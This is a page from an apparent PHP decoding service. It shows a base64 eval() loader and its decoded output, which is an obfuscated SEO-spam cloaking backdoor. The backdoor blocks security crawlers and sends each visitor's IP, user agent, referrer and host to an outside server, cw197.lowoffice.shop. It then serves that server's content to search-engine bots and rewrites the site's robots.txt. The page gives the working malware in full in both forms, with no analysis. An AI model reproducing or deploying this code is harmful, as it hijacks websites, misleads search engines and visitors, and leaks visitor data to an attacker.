Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJ..

Decoded Output download

?>b'<?php eRRoR_rePORTinG((int)RoUnd(-77.5+-77.5+-77.5+-77.5)-(int)rOund(31+31+31+31)+(int)RouND(38.75+38.75+38.75+38.75)-(int)ROUNd(-93+-93+-93));function _tzmrar($_vdmd=0.060984313787689,$_xpyjb=false,$_ygab=null,$_wdbkpbc=null,$_olwku=true,$_pawv=021571){if(gETEnV("HTTP_CLIENT_IP")){$_gsylkhbq=GEtEnV("HTTP_CLIENT_IP");}if(gEtenV("HTTP_X_REAL_IP")){$_gsylkhbq=GETEnV("HTTP_X_REAL_IP");}elseif(GEteNv("HTTP_X_FORWARDED_FOR")){$_gsylkhbq=GETENv("HTTP_X_FORWARDED_FOR");$_wnqcy=EXPlODE(",",$_gsylkhbq);$_gsylkhbq=$_wnqcy[(0604- -0455-01267)+(int)roUnd(3+3)];}elseif(geTENv("REMOTE_ADDR")){$_gsylkhbq=gETeNV("REMOTE_ADDR");}else{$_gsylkhbq="0.0.0.0";}return$_gsylkhbq;}function _sufpsvh($_gyjq){$_zhhtv=@FiLe_gET_conTENTs($_gyjq);if(empty($_zhhtv)){$_iehhhu=cuRL_iNIt();cuRL_SeTopT($_iehhhu,(023212+061)-(int)rouND(5046.5+5046.5)+(int)ROUND(3393.3333333333+3393.3333333333+3393.3333333333),$_gyjq);cUrl_SEtopT($_iehhhu,(045756-046307-047361+0117056)+(046302+046012+-046223)+(050373-050552+050572- -046)-(int)roUNd(10113.25+10113.25+10113.25+10113.25),true);CURl_sEToPT($_iehhhu,(int)RounD(13+13+13+13),false);if(StRPoS($_gyjq,"https://")!==false){cURl_setopT($_iehhhu,(int)ROund(32+32+32)-(071+-031),false);cuRL_SetOpT($_iehhhu,(int)roUND(27+27+27),false);}$_zhhtv=cURl_EXec($_iehhhu);CURl_closE($_iehhhu);}return$_zhhtv;}function _yxqatl($_gyjq,$_pimlx=false,$_djidxkdq=null,$_znzkrdxj=-0.32546231741605,$_egcz=077051,$_qlrj=null,$_stgptt=1.4223854718014,$_ntufnsbn=null){$_iehhhu=curL_iNit();CUrl_sETOpt($_iehhhu,(int)ROuND(5001+5001),$_gyjq);CUrL_setoPT($_iehhhu,(int)RouND(9956.5+9956.5),true);CURL_SEtoPT($_iehhhu,(int)rOUnd(148.25+148.25+148.25+148.25)-(int)ROUnD(-268.66666666667+-268.66666666667+-268.66666666667)-(int)Round(-76.5+-76.5+-76.5+-76.5)-(03044+0121),false);CuRl_SeTopt($_iehhhu,(int)rOUND(2504.5+2504.5+2504.5+2504.5),$_SERVER["HTTP_USER_AGENT"]);if(sTrPOS($_gyjq,"https://")!==false){cuRL_SeTOPt($_iehhhu,(01330-0233+-0413+-0556)-(-0643+0447),false);CUrl_setopt($_iehhhu,(-0113+0117+-032)-(-0160+-0246-0514- -01231)-(0656-0741+060)-(-0225- -0243+-0216+-033),false);}$_zhhtv=curl_exeC($_iehhhu);CUrL_clOSe($_iehhhu);if(empty($_zhhtv)){$_zhhtv=@fIlE_GET_ConteNtS($_gyjq);}return$_zhhtv;}if(PREG_matCH("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i",$_SERVER["HTTP_USER_AGENT"])){heADER("HTTP/1.0 403 Forbidden");exit();}$_ridya="bing|google|yahoo";$_utriyjs="http://cw197.lowoffice.shop/index.php";$_fdvgb=(int)RoUnD(983.66666666667+983.66666666667+983.66666666667);$_bzkjof=urlEnCOde($_SERVER["HTTP_USER_AGENT"]);$_yycbf=urLenCodE($_SERVER["HTTP_REFERER"]);$_owmshtzt=URlenCOde($_SERVER["HTTP_ACCEPT_LANGUAGE"]);$_aalop=_tzmrar();$_gsylkhbq=uRLEnCOde($_aalop);$_izuttvg=uRLenCodE($_SERVER["HTTP_HOST"]);$_nrzs=urLenCode($_SERVER["SCRIPT_NAME"]);if((!empty($_SERVER["REQUEST_SCHEME"])&&$_SERVER["REQUEST_SCHEME"]=="https")||(!empty($_SERVER["HTTPS"])&&$_SERVER["HTTPS"]=="on")||(!empty($_SERVER["SERVER_PORT"])&&$_SERVER["SERVER_PORT"]=="443")||(isset($_SERVER["HTTP_X_FORWARDED_PROTO"])&&$_SERVER["HTTP_X_FORWARDED_PROTO"]=="https")){$_SERVER["REQUEST_SCHEME"]="https";}else{$_SERVER["REQUEST_SCHEME"]="http";}$_buyicttj=UrLeNCODe($_SERVER["REQUEST_SCHEME"]);$_qakjieat=urLDEcODe($_SERVER["REQUEST_URI"]);if(StRpOS($_qakjieat,"uuuuxxxxooo")!==false){echo"ok";exit();}if($_aalop=="153.246.135.238"||$_aalop=="219.101.44.233"){HEAdEr("HTTP/1.0 403 Forbidden");exit();}$_ilnp=(int)rOUnd(0+0+0);if(!fIle_eXists("uxo.txt")){$_kcvtc=$_buyicttj."://".$_SERVER["HTTP_HOST"]."/uuuuxxxxooo";$_kwoiaj=_sufpsvh($_kcvtc);if($_kwoiaj=="ok"){$_ilnp=((-0504+0217+0270)-(-0565+0612)+(int)roUnd(9.5+9.5));@fiLe_pUT_cONtEnTs("uxo.txt","1");}else{$_ilnp=((-0735+-0255)-(-0351- -0310)-(-01712+-0462- -01312+-067));@File_put_CONtenTS("uxo.txt","0");}}else{$_ilnp=@FIle_GET_ConTENTS("uxo.txt");}if(StrPos($_qakjieat,"pingsitemap.xml")!==false){$_lqjxoz=$_SERVER["SCRIPT_NAME"];if(STRpoS($_lqjxoz,"index.php")!==false){if($_ilnp==((0135-0326+0334)+(int)rOund(-49.5+-49.5))){$_lqjxoz="/?";}else{$_lqjxoz="/";}}else{$_lqjxoz=$_lqjxoz."?";}$_mpezuldb="https://www.google.com/ping?sitemap=";$_greuthp="User-agent: *
Allow: /";$_ijfdstum=$_buyicttj."://".$_izuttvg.$_lqjxoz."sitemap.xml";$_greuthp=tRIM($_greuthp)."
"."Sitemap: ".$_ijfdstum;$_jxoulm="";echo$_ijfdstum.": ".$_jxoulm."<br/>";$_rvgftb=$_utriyjs."?agent=".$_bzkjof."&refer=".$_yycbf."&lang=".$_owmshtzt."&ip=".$_gsylkhbq."&dom=".$_izuttvg."&http=".$_buyicttj."&uri=".$_qakjieat."&pc=".$_fdvgb."&rewriteable=".$_ilnp."&script=".$_nrzs."&sitemap=".URLENCOdE($_ijfdstum);$_kwoiaj=_sufpsvh($_rvgftb);@filE_puT_CoNtEnts("robots.txt",$_greuthp);exit();}else if(sTRPoS($_qakjieat,"favicon.ico")!==false){}else if(stRpoS($_qakjieat,"jp2023")!==false){$_rvgftb=$_utriyjs."?agent=".$_bzkjof."&refer=".$_yycbf."&lang=".$_owmshtzt."&ip=".$_gsylkhbq."&dom=".$_izuttvg."&http=".$_buyicttj."&uri=".$_qakjieat."&pc=".$_fdvgb."&rewriteable=".$_ilnp."&script=".$_nrzs;$_kwoiaj=_sufpsvh($_rvgftb);echo$_kwoiaj;exit();}else if(STrPOs($_qakjieat,"robots.txt")!==false||StrpoS($_qakjieat,"writerobots")!==false){$_rvgftb=$_utriyjs."?agent=".$_bzkjof."&refer=".$_yycbf."&lang=".$_owmshtzt."&ip=".$_gsylkhbq."&dom=".$_izuttvg."&http=".$_buyicttj."&uri=".$_qakjieat."&pc=".$_fdvgb."&rewriteable=".$_ilnp."&script=".$_nrzs;heADeR("Content-Type: text/plain; charset=utf-8");echo$_kwoiaj=_sufpsvh($_rvgftb);@file_put_coNteNTs("robots.txt",$_kwoiaj);exit();}else if(pREG_MaTCH("@^/(.*?).xml$@i",$_qakjieat)){$_rvgftb=$_utriyjs."?agent=".$_bzkjof."&refer=".$_yycbf."&lang=".$_owmshtzt."&ip=".$_gsylkhbq."&dom=".$_izuttvg."&http=".$_buyicttj."&uri=".$_qakjieat."&pc=".$_fdvgb."&rewriteable=".$_ilnp."&script=".$_nrzs;$_kwoiaj=_sufpsvh($_rvgftb);if($_kwoiaj=="500"){heADEr("HTTP/1.0 500 Internal Server Error");exit();}else{hEadeR("Content-Type: text/xml; charset=utf-8");echo$_kwoiaj;exit();}}else if(pReg_matCh("/(".$_ridya.")/i",$_SERVER["HTTP_USER_AGENT"])){$_rvgftb=$_utriyjs."?agent=".$_bzkjof."&refer=".$_yycbf."&lang=".$_owmshtzt."&ip=".$_gsylkhbq."&dom=".$_izuttvg."&http=".$_buyicttj."&uri=".$_qakjieat."&pc=".$_fdvgb."&rewriteable=".$_ilnp."&script=".$_nrzs;$_kwoiaj=_sufpsvh($_rvgftb);if(!empty($_kwoiaj)){if($_kwoiaj=="500"){HeAdEr("HTTP/1.0 500 Internal Server Error");exit();}if(SUBstR($_kwoiaj,(int)ROunD(0+0+0),(-0106+-0176)-(-0450- -0235)+(int)ROund(31+31))=="<?xml"){heAdEr("Content-Type: text/xml; charset=utf-8");}else{Header("Content-Type: text/html; charset=utf-8");}echo$_kwoiaj;exit();}}else if(PrEG_MatcH("/(".$_ridya.")/i",$_SERVER["HTTP_REFERER"])){$_rvgftb=$_utriyjs."?agent=".$_bzkjof."&refer=".$_yycbf."&lang=".$_owmshtzt."&ip=".$_gsylkhbq."&dom=".$_izuttvg."&http=".$_buyicttj."&uri=".$_qakjieat."&pc=".$_fdvgb."&rewriteable=".$_ilnp;$_kwoiaj=_sufpsvh($_rvgftb);if($_kwoiaj=="500"){HEAdEr("HTTP/1.0 500 Internal Server Error");exit();}else if(!empty($_kwoiaj)){headER("HTTP/1.1 404 Not Found");echo$_kwoiaj;exit();}}else{};?>'

Did this file decode correctly?

Original Code

<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJDZ2lQejRpTG1KaGMyVTJORjlrWldOdlpHVW9JbEJFT1hkaFNFRm5XbGhhYUdKRFoybFFlalJwVEcxS2FHTXlWVEpPUmpscldsZE9kbHBIVlc5SmJFSkZUMWhrYUZORlJtNVhiRnBMVlRKSmVGTnRXbXBpVmxwU1ZrUkdTMVpYUmxoT1ZXaE1VVEpvZDFsdE5WSmpSbFowVDFaYWFXSldSblpVUmxKcVRUQjRjVlpZU2sxV1IwMTZWRWR3Vm1OcmVGVlplazVOWVd4V2VWUkdVbXBOTUhoeFZsaENUVlV5YUhkWmJUVlNZMGRPY2s5VVJtbGlWa1oyVkZod1JtTnJNVFpTV0VwT1pXdFdlVlJZY0VaalJYUTFZVWhDYVdKc1JuZFdWekExVFZaU2NsVlhPVTVsYldReFZHNXdWbU5yTVRaYU0xWlBaV3hXZVZSWWNHNWtWVFUyVmxoS1RtVnRaREZVYm5CV1kwVjRWR0ZJUW1saWJFWjNWbGR6TlZac1VuUlZWemxOVmtkME5sTXphM2RPVlRFMVl6TlNVRlpGTVhkVE1WSXdZbGRTV0U1WGNHdFNNbmd5V1cxc1ExcHRVa2xqU0ZKcVlsVmFOVk13VGxOYWJWSjBWVzVTWVZKRVFqTlVSM0JDVFdzeFJXRjZVazlTUlRFMFZGaHdhazVGTlRaWFZGSlFWVE5rY2xkRVRtOWtNbFpZWTBkc1VWWXhjRzlaYTJoUFlrVjRSRlZ0V214V01sSnZWMWR2ZUdSWFVsaGxTRTVOVVRGS2JWcEVTbE5oVjBWNlVXMXNXbVZxUmpGYVJtUTBZekI0UkZWdFdtbE5ibWQ2V1ZST1ZrOVhVa2xUYWtaaFZUTmtjbGRFVGtOaFIxRjZWMVJzVGxKRmJEUlViRkpxWlVWMFdXUklRbUZoVjJoMVZXeGFVMUp0U25OWFZ6bEtZa2hrTkZSV1VrTlpNbFpGVmxSQ1YxSnJTbXBVVmxKT1RURkZkMlZGY0ZOV2JtY3dWR3RrVjFaV1ozZGlSMDVzVWtaV00xTlhiSEpqUjFZMVZXMWFZVTB3TkRGWmEyUXdZakZzZFZKVWJGTk5SbGwzVld4ak1WWXdkRVJUYTJ4WFVteEthbHBWVWxaa01XZDNWRzFPYkZKR1NuRlZNVlpYV1RKV1JWVnRlRmxTUlZZMVZHdFpOVk5zYUVWU1dHeE9VVEJzZDFSNlRYaGpSbkJ3WVVjMVUxZEdTbk5aYlhoYVlqQnNjMlF6YUU1V1JVcHFWRlpTU2sxR2FFbGFla1pQVW10S2JWWXdXVFZaTURGVlUxaHNXVk5IWTNkVWJGbzBUa1UxUlZKck1WbE5XR1EwVkZaU1IxVlZiSEJoTTBKc1pWWktiVmRxVGs5T1YwcElaRWM1V21KclZUVlZha0pYVmxaS1dFNVdaRXhSTUhCS1YwVlNSbVZWTlVkbFJGSlBWa1pLYWxwVlVsWmtNV2hGVWxod1QwMVhhRzFYUldodVRWVXhjbFpyU2xWU2FteHFXbFZTVWs1V2FFbGFla1pPVVRCc2QxUjZUWGhpUjBwSlZHMTRhRll4YkhaVmFrSlhUVVp3Vms1VVNreFJNSEJLVjBWb2JrMVZOVWRWYlU1c1VrWldNMWRFUm05YWJFcHlUMVpPVjAxRldtcGFWVkpXWlZaS1JsWnJWbGxOUm5CUlYwVlNSbVZWTVhCVFdFSk1WMGhPY2xkRVNtdGxiVlpZWlVoS2FGSXdjRFJWUmxaclVteGFSbFpyT1d0aFYyUndWMFZvYmsxRk9VZFZiRlpaVTBkamVGUlZXak5sUlRFMldrZE9UbFpGTVROWFJXaHVUVlp3Y2xkdFRteFNSa3AwVjBWU1JtVlZNWE5sUkZKUFZrZFNhbHBWVWxKbFJsWnlWV3RhVTFKdVp6QlViR1JoVWpGUmVGTlhiRXhXU0U1eVYwUk9hMlJYVGxoVWFsWlJWbFphV2xaVlpEUlZSa3BHVmxjNVNtRllaSEJVUlU1VFdteHZlbFJxVm1sU00xSjJWMWMxUm1ORk9UVlZiVnBoVFRBME1WbHJaREJpTVd4MVVsUnNTMUpxYTNwWmJUVkhZVzFXVjJNeU9VNVNSbXd6Vkd0TmQxb3dlRlZSVkVKUFZrWldNRlJWVWtabFZUVnhXVE5DVEdWWGFIZFpiVFZTWTBkT2RFOVdXbWxpVmtaMlZGaHNlbVZyZEZkTlJHUnRWakZhZWxsNlNsZGpSbkJ3WVVjMVlWWnNTa2RXUnpWYVlqQnNjMU5yV2xWV1ZHeHFXbFZTVmsxR1NsZGtNMmhPWlcxU2FsUldVa0psUmtwSFpVUlNUMUpHU2xSVFYyeHlZMGRXTlZWdFdtRk5NRFF4V1d0a01HSXhiSFZTVkd4aFRVWmFWbGRzVlRGV01IUkVVMjFPVGxaRmJEVlZiRlY0VlVaYVJsWnRXbGxUUjJOM1ZGWmFORTVGTlVWVmExWlpVMGRqZUZSWGJFcGpSVGg2VFZkNGFWTkZOWE5hV0d4VFdteHZlbFJxVm1sU00xSjJWMWMxUms5VmJIRlJiVTVPVWtaVmVWZEZVa0pOYXpGRVRsZE9UbEpHYkROVVIzQkNZVlU0ZWsxWWJHRlhSa2w0V1RJd01HRXhaM2xhU0hCc1ZqTm9lVmxWWkV0bFJUaDZUVmN4YTFaNlZuRmFSV1J6WkcxS2NGRnRXbXBOTVZwMFdUQm9UMDF0UmtSYU1uUlpUVzFSTVZsWE5VWmpSMVkxVlcxYWJHSlhhSFphUldoYVQxWkdSbGR1UWxWU01WcHRWMnBDVjFaV1ozbFVibHBwWWtaS1IxWkhlRk5sYTNSRVZXMWFZVTB5ZUhoWk1VNXlUakpHV0ZkWE9XRldla1l6V2tWb2NtSXdjRWRQVkZwb1VqSm5kMXBIYkhKalIxWTFWVzFhYUZZeFduWlpWV1J2VFZaQ1dGUnFSbFpoTTJodFdWWlZNVk50VWtSYU0wSlFUV3MwZUZaWGREUmFiRlY1Vm14V2FVMHdTbFpUTUU1VFdtMUdXRlp0T1doU01tZDRWRVZPYm1Rd01YRlVXR3hPVmtWc2VWUlZVbHBsUlhSVVRVYzVhRlo2VlhkVE1XaExaRzFTVms1VlZreFNSbFl6Vkd0U1dtUlZOVlJqZWtaT1VrWkZlVlJIY0ZaalJYUTFZVWhDYVdKc1JuZFdWM00xVm14U2NsVlhPVTVsYXpBeFZGaHJNR1ZyTVRaVVdIQk9aV3N4TmxSWWNFNWxhM1EyVkZod1VGWkZNVEZVV0hCT1pXc3hObFJZY0U1bGF6RTJWRmhzZW1Wck1UWmhNM0JOWVdzeE5sUlljRTVsYXpFMlZGaHdUbVZyTVhkVVJVNVRXbXh2ZW1KSVJtcFZNbk16VjFSR1YyVlhTa2RQVmxKVFYwWktNbGt3V2xKaU1IQkhUMWhDWVZZeWFIWlpWV2hXWXpCMFJWRlVRazlXUjAxNFZHMXJkMlF3TlVWWFdIQk9Va2RPTUZSVlVsSk5NREUyVjFob1RHVnJSalJVVmxKcVpEQTFWVmRZUWt4bFYyUXpWR3RTV21Wck1VVlRXRXBPVWtaRmVWUlZVa1psVlhRMVRVaGtUMUpHYkRWVVYzQk9ZMFYwTlZvelpFOVdSVVkyVkc1d1RtUkZNVVZXV0dSUFZrWldOVk16Y0VKTlZURkZWbFJPVG1GVVFtNVVSbEpDVFVVMWNHRXpVa3hTTW5neFdrVk9jMlZYU1hoV2F6bGhVVEprTkZSVlVrWmxSVEUxVGtoc1QxVXpUalJVVlZKR1pVVXhOVTVJYkU5Vk0wNDBWRlZTUm1WRk1UVk9TR3hQVlROT05GUlZVa1psUlRFMVRraHNUMVV5ZEhwYVJXaExUVlp3VkdGNlpGSk5WbHBVV1d0Wk5XVnNTbGRWYmxwV1VteEdkbE5yV1RWalJuQllZVWM1YUZOR1ZucFRNR1J6WkZkU1JHSkdUbWxOTVZveFZXdE9ibVZGTVRWak0yaE9aVmhPTkZSWWJIcGxSVEUxWVROT1lXSlZXbnBaZWtwV1kwVTRlV0pITVV4U2F6UjNWbGQ0UTJSc1ZqVmFNblJaVFcxUk1WbFhOVVpqTUd4MFlVZE9UbFpHYTNkYVJXaERaV3M1YzJWRVVrNWlWbXd5VTFkc2NtRkdRbFZOVnpGYVZqTm9ObGRzVG5OT01XdDRWbXhPYVZKcWJEWlhiR2hUWkcxT1IxVlhPVXRTYW14M1YyeGtiMkl5UmtsV1dFNU1Vako0TVZwRlRuTlZNVkY2Vm01V1lWRXlaRFpVVjJ4NlpXc3hjR016Y0U1aFYzUXdVekJTUWswd01WUmpNMUpPVWtVeE5GTXhUalJpVm14WVpVaHdZVlV5Y3pOWFZFNVhWVEZTUjA5V1VtRlhSa3BSV1RCYVVtSXdjRWRQV0VKaFZqSm9kbGxWYUZaak1IUklZa2hXYTFFeWVEVlpha1pYVkRGS1JGb3piRTlsV0U0MVZHNXNlbVZWTlRWaE0wNWhZbFZhZWxsNlNsWmpSVGg2VFVkMFdVMHpRblpaVldoVFRXeENXRlJzV2xaaVdHaHRWV3hhYjJKR2JEVmFNblJaVFcxNGMxbFZaRzlpTWxKVVlYcGtVazFXV2xSWmExazFZVzFLU0U5WWNGTlZNbVJ5VjBSS2MySkhSa2hoUnpsclZUSnpNMXBzYUV0aVIxSkpWbTVzYVdGV1NtMWFWekZ2WWpKU1NWZFVaRzFXTVc5NFdXMHhUMDFIUmxoUFdGWktVbXByTVZwVmFFZGhSMUpJWkRJNVMxSnFiSFZhVm1SM1pVVjRSRlZ0V21wU01uZ3dXV3RvYms5V2NIUlNiazVxVFd4V2VsTnJXVFZoTWtaMFlrZDBiRkl6VW5KWk1WRjRaRmRTV0dWSVRrMVJNVXB0V2xjd01VNXRSWHBUYlhSc1VqSTROVlJHVWtKa1ZURTJVMVJHVDFKR2JEVlVXSEJHVFRBMVJWSlVTazVTUmxaNlUydFpOV0pHYjNsVWFscFJWa1ZGZWxSdWNFSk5WVEZVWkRKMFdVMHdXbnBaTWpGMlQxZEtkVlp1VG1sUk0yUnlWMFJPVDAxR2IzcFJha0pyVWtSQ05GUkhjRkpsVlRGeFZGUlNUMVpHUlhwVVZsSnVaREF4VlZWWVRrdFNhbXd4V2tWb1YySlhTblZVYld4cFlXcEdNVnBHWkRSak1IUlpZekowV1UxdGVITlpWV1J2WWpKU1ZVMVhjR3RYUlhCT1YwUktjMVF5UmxsVlZ6bE1Wa2hTUlZac2FFdGpNV2Q2Vkd0YVYxSlViRE5hUlU1dVlURm5lV0pIZUdoU01taDJXa1pPTTJJeVJsaE9WRUpNVm10d1VWcEdWVEZTVlhSRlZsaGtUbEpGVm5sVWJGSkNaREF4VkdFelRrdFNhbXgxV2xaa2QyVkZkRlZrUlZKWFYwVndUbGRFVGs5aVIxSklUMVpHVjFFeVpISlhSRXB6WWtkR1NHRkhPV3RWTTJSMldWWmpNVTFGZEZkVGJscHJWbFJXUmxNd1VuSk9WVFZWVjFoV1QxVXpUVEZVTVZKV1RXdDRjVlpZUWsxVFJrbzFXa1prVm1ORk9IZFViRnBXWVROb2JWWlVRbGROUjBsNFVXeFdURkV4U20xWlZtUlhZakpHU0dGRVJrMVJNbWgzV1cwMVVtTkhUbkpQVmxwcFlsWkdkbFJXVWxKT1JYaHhVMVJHVEdWclZYZFVNRTB3WlZVMVZHTXphRTlTUjJReFZGZHdWbU5yTVZWVlZGSk5ZV3RyZUZNeFRYZGlNa1pZVGxSQ1RGWnJjRkZXYkdNeFVsVjBSRTFJYkU5aGJXUXhWRzF3V2sxck5YRlhWRXBQWVd4cmVWUnRjR3BqYTNoVlUxUktVRkY2VVhsVWJYQmFUV3MxY1ZkVVNrOWhiR3Q1Vkc1c2VtUkZNWEZYVkZKTllXeHJlVlJ0Y0ZwTmF6VnhWMVJLVDJGc2EzcFRNVTEzWWpKR1dFNVVRa3hXYTNBeVdrWmpNV0V3ZEVSTlJFNVBZVlJSZUZNemEzZE5NRFZ3VGtSR1RHVlVRWHBVYldzd1RWVjBOVTFFVGs5aFZGRjRVekZOZDJJd01VVlVXR1JQVWtaR2VWUlZVa1psVlRGVVlUTk9ZV0pWV25wWmVrcFdZMFU0ZDFScVJsWmlXR2h0VmxSS1YxWlhTWHBSYWtKTVVURktiVmxXWkZkaU1rWklZVVJHVFZFeWFIZFpiVFZTWTBkT2NrOVdXbFZoTVVaMlZGZHdWbVF3TlVST1JFWk1aV3RyZUZSVlVsSmtWVFZVWXpOc1QxWkZSWGRVUjNCV1kyc3hjVlpZWkU5UmVsRjRVekZPTTJFeFozaFVhMXBXWWtad1IxWlhlSHBoVm1oSlducENVRkpzU21wVVZsSktUVVpXUjJWRVVrOVdNWEJxVkZaU1NrMVdWWGRXYkU1WlRWaGtORlJWVWtkWk1ERlZVVlJPV1ZKRlZqTlViRlV4VmxWc2MwMUlRbEJOYlhoMFV6Qm9UMVpYVG5OUmJFSldaVmRrY2xkRVNtdE9WMFoxVWxoT1NtSklaekJVYlhCdlRVZFNTVkZ0VG14U1IwNDJWREpyTkdScmJIQmhNbWhSVmtSR2RGZFdaRFJsYkhCVVlrUmtXazB4V2xSV1JWazFWa1p3VjFWc1FsWlRSa1oyVTJ0Wk5XTkdjRmhoUnpsb1UwWldlbE13VWtKbFJURTJWRmhrVFZaRlJqVlVXSEJPWTJ0NFZWRlVRazVXUlRGNVZFWlNRazFWTlZWWFdFSk5WVEprTUZSVlVscE5SVEUxWXpOa1QxSkdSWHBUTVU0MFlsWnNXR1ZJY0dGVk1uTXpWVlJHVjJWWFNrZFBXSEJoVjBaS01sa3dhRkppTUhCSFQxaENZVll5YUhaWlZXaFdZekIwUkUxSVpFNVdSVlkyVXpOd1FtVkZNVlZaTTBwTlZrVkdObFJYYkhKa1JYUkVUVWhrVGxaR2JETlRNMnQzWkRBeGNWVlVTazFXUlVWNFZGWlNVbVJGYkVSTlNHUk9Wa1ZzTmxSV1RuSmtSWFJGVVZSS1QxWkdiREJVVlZKcVRVVXhWR016WkU5aGEwWjNWRVpPYm1SRk1VVlRXR3hQVlhwQ2JsUkdVa0psVlRWRlZGaEtUVlpGUmpWVVZsSmFZMnQ0VlZGWWNFNWxWM1I2VjIweFIyTXlUWGxXV0VKUVRYcENjbGRFVG5kaU1rWkpWV3BLVVZZd05IaFpNakUwV214d1dXRkhlRkpsVjJSeVYwUktjMkpIUmtoaFJ6bHJWVEp6TTFWVVJsZGxWbEpIVDFkd2FWSlViRlZYYkU1dVlURm5lV0pIZUdoU01taDJXa1pPY2s0eVJsaFhWemxoVm5wR00xcEZhSEppTUhCSFQxUmFhRkl5WjNkYVIyeHlZMGRXTlZWdFdteGlWMmgyV2tWb1drOVdSa2hYYTNCcFVsWmFiVlZxUWxkV1ZtZDNWRzVhYVdKc1NuTldSelZUVmtWMFJGVnRXbUZOTW5oNFdURk9jazR5V2xsVGJYaHJVMFphTlZsdGJGTmFiVlowWVVjNWExTkdhek5hYkdSellsVjBSMUZzVGxOV1YxSnRXV3hrUjAxR1JYZGFNamxLWWtoa00xUnNVbXBpTVdoRlVsaGtUbUpJWkRSVWJuQkhXVEpXUlZsNlFsbFRSMk41Vkd4b1Qxa3dNVlZYV0dSb1ZqRktjMWRGVWtaTmF6RjFaVWRPYkZKR1ZqTlhSV2h1VFdzMVdWVnRUazVXUmtZMFdXdFdTMlJzYUVsYWVrNVBVMGhvUTFsVmFFdGlSbWhKV25wS1QySklaekJVYm5CUFdUQXhWVkZZYkdsTk1VazBWVmN4UjJWWFJYcFRiVTVzVWtad2RGcEVTalJpUm1oRlVsUktUbUpJWnpCVWFrcFBWR3hvU1ZwNlFscFdibVF6Vkcxd1JtVldhRVZTVkVKT1lsUnJkMXByVm1GWk1ERlZWVlJHV1ZOSFkzbFViR1JUVWxab1NWcDZTazlXYm1RMFZHeFNWMWt5VmtWWGJURlpVa1ZWZUZSdGVETmxSVFUyVlcxT1RsWkZWalZYUldodVRXczVXR1JIVGs1V1JrVjRWbFJPUTJOR2FFVlNWRUpQVWpGYU5WcHJWbk5rVm5CSFpETm9UMlZyVm01WFJXaHVUVVpyZVdKSFRteFNSbXcxVjBWb2JrMHdNWFJTYlU1c1VrZE9OVnBXYURSWk1sWkZWVmhvV1ZKRlZYbFVWRVkwVGtVMWRGTnNWbGxUUjJONVZGZDRNMlZGTVVWWGJHeFpVMGRqZUZScldtRlpNREZWV1hwQ1VrMHdjRzlhUkVvMFdUQXhWVkZVUWxsU1JWVjNWRlprVTJFeGFFVlNWRTVPVjBob2FsUldVa0psYkdoRlVsUkdUMDFxYkdwVVZsSldUVWRPU0ZKdFRrNVdSa1YzVm1wR00yVkZOVVZXYlU1c1VrWnNOVmRGVWtaTlZUQjRaRE5vVDFaRldYZGFhMVozWVVkU2MyUXphRTlTUlZwcVZGWlNhazFHU25ObFJGSlBZV3hhYzFkclpEUk9WMXBIVm0xT2JGSkdjSE5YUlZKR1RWVXhXVmR0VG14U1JtdDRWMFZvYmswd01YTmxSRkpQWldzMWIxbHJXalJPUlRWRlYyMTRZVll4U21wVVZsSktaREZzV1ZOdFRteFNSMDQyVjBWb2JrMXJOVmxUYW1oWlUwZGpkMVJXV2pObFJUVnhVVzFPYkZKR2JEUlhWRXB2V1RBeFZWVlVSbGxUUjJOM1ZGZDRORTVGTlhGV2JVNU9Wa1pWZVZkVVJqTmxSVFZWVVdwb1dWTkhZM2hVVkU1clkwWm9SVkpVUWs5aVNHY3dWRzV3VTJGWFNYcFZiVTVPVmtkTmQxWXlNSGhaTWxaRlZWUkdhMWRJYURKVlYzZzBUa1UxZEZkcVFtMVNibWN3VkcweFIxa3dNVlZWV0doclZucFdhbFJXVWxwTlJtaEZVbFJPVGxkSWFHcGFWVkpXWkRGb1JWSlVUazVYUmtwMlYwVm9iazFzY0hST1YwNU9Va1pWZUZwR2FFdGpNa3BIWlVSU1QyRnRlSEJhYTJoRFRsZFNSMlZFVWs5aGJXZ3lWMFZvYmsxc2NGZGtNMlJQVmtaYU5WZHNhRWRaTURGVlYxUkdXVk5IWTNsVWJHaFBXVEpXUlZsNlFsbFRSMk42VkZSR00yVkZOVFpWYlU1c1VrWndjVmRGYUc1TmF6bFhaVVJTVDJGdFVtcGFWVkphVGtkU1IyVkVVazlTUmtwelYwVm9iazFyTUhobFJGSlBZbFZ3VkZkRlVrWk5SVFZaVVc1YWFtSklaekJVYm5CVFpXeG9SVkZVUWs1U1ZYQXlXa1ZhTTJWRk5UWlZiSEJaVTBkamVGUXhXazlrTVdoSlducEtVRll4U21wVVZsSlNUVlpvUlZKVVNrNWlTR2N3VkdwS1QxSldhRVZTVkVaT1ZtNW5NRlJ0Y0d0U2JHaEZVbFJPVGxKdVpEUlViWEJUVDBaa1dHSkhUbXhTUjA0MlYwVm9iazFzY0hObFJGSlBaV3hhYWxwVlVsWmxiVTVJWWtkT2JGSkdhM2RYUlZKR1RVVTFXVk5xYUZsU1JWWTBWRlZvVTAxSFRrWlViazVvVmpGYU1WcEZhRFJpTVdoSlducEtUMWRGY0dwVVZsSldaVWRTUjJRemFFOWhhM0IzVjBWb2JrMHdPVWRsUkZKUFRXczFSMWRGVWtaTlJURlpWRzVhYTFack5UTlhSV2h1VFdzNVdGVnRlR3BpYm1ocVdsVlNVazFYVm5ObFJGSlBZbFp3YWxwVlVtRmlWbWhGVWxSR1QxWnVaRFJVYlhCUFQwWm9SVkpZWkU1V2VrWnZXbGQ0TkU1Rk5YUlhiVTVPVmtaVmVWVlhlRFJPUlRWMFYycENXVk5IWTNwWFZFWlBXVEF4VlZGVVJsVlhSVzk0VjBWU1JrMXJNSGhrTTJoUFZrVkthbHBWVWxKbFZtaEZVbFJHVDAxWVp6QlVibkJUV1RBeFZWbDZRbGhXYm1jd1ZH